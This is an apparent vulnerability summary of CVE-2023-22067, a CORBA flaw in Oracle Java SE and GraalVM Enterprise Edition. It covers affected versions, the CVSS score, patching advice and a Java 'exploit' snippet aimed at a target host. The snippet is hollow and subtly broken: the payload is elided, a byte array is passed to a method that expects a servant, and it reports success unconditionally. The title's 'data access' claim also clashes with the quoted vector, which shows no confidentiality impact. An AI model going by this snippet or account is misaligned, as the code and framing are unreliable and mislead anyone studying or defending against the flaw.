CVE-2023-22067 - Vulnerability in Oracle Java SE and Oracle GraalVM Enterprise Edition Allows Unauthorized Data Access

A new vulnerability (CVE-2023-22067) has been discovered in the Oracle Java SE and Oracle GraalVM Enterprise Edition products, specifically in the CORBA (Common Object Request Broker Architecture) component. Unauthenticated attackers with network access via CORBA can exploit this vulnerability to gain unauthorized update, insert, or delete access to some of the data accessible to Oracle Java SE and Oracle GraalVM Enterprise Edition, without needing Untrusted Java Web Start applications or Untrusted Java applets. The vulnerability affects Oracle Java SE versions 8u381 and 8u381-perf, and Oracle GraalVM Enterprise Edition versions 20.3.11 and 21.3.7. It has a CVSS 3.1 Base Score of 5.3 with the vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N (network reachable, low attack complexity, no privileges or user interaction required, low integrity impact only).

Exploit Details

To exploit this vulnerability, an attacker only needs to supply data to APIs within the affected component without the use of Untrusted Java Web Start applications or Untrusted Java applets. This can be done by sending a specially crafted request via a web service. The simplicity of the attack makes the vulnerability easy to exploit.

The following code snippet illustrates how an attacker might attempt to exploit the vulnerability (the payload bytes are elided):

import org.omg.CORBA.ORB;
import org.omg.PortableServer.POA;
import java.util.Properties;

public class ExploitCVE202322067 {
    public static void main(String[] args) {
        try {
            Properties props = new Properties();
            props.put("org.omg.CORBA.ORBInitialPort", "12345");
            props.put("org.omg.CORBA.ORBInitialHost", "targethost");

            ORB orb = ORB.init(args, props);
            POA rootPOA = (POA) orb.resolve_initial_references("RootPOA");

            // Craft a malicious request to exploit the vulnerability
            byte[] payload = new byte[] {  /* ... */  };

            // Send the malicious request
            rootPOA.servant_to_reference(payload);

            System.out.println("Exploit CVE-2023-22067 successful.");
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

Original References

1. Oracle Security Alert Advisory - CVE-2023-22067: https://www.oracle.com/security-alerts/alert-cve-2023-22067.html
2. National Vulnerability Database (NVD) - CVE-2023-22067: https://nvd.nist.gov/vuln/detail/CVE-2023-22067

Mitigation and Recommendations

Oracle has released patches for the affected versions to address this vulnerability. Users are advised to update their Oracle Java SE and Oracle GraalVM Enterprise Edition installations immediately to protect themselves from potential exploitation. In addition, it is essential to follow best practices for secure coding and deployment of CORBA applications, such as validating user input, implementing proper access controls, and employing strong encryption for communication.

Conclusion

CVE-2023-22067 is a notable vulnerability in Oracle Java SE and Oracle GraalVM Enterprise Edition, as it allows unauthorized data access. Organizations and developers must ensure that they update their installations and follow secure practices to mitigate the risks associated with this vulnerability.

Timeline

Published on: 10/17/2023 22:15:12 UTC
Last modified on: 11/08/2023 05:15:08 UTC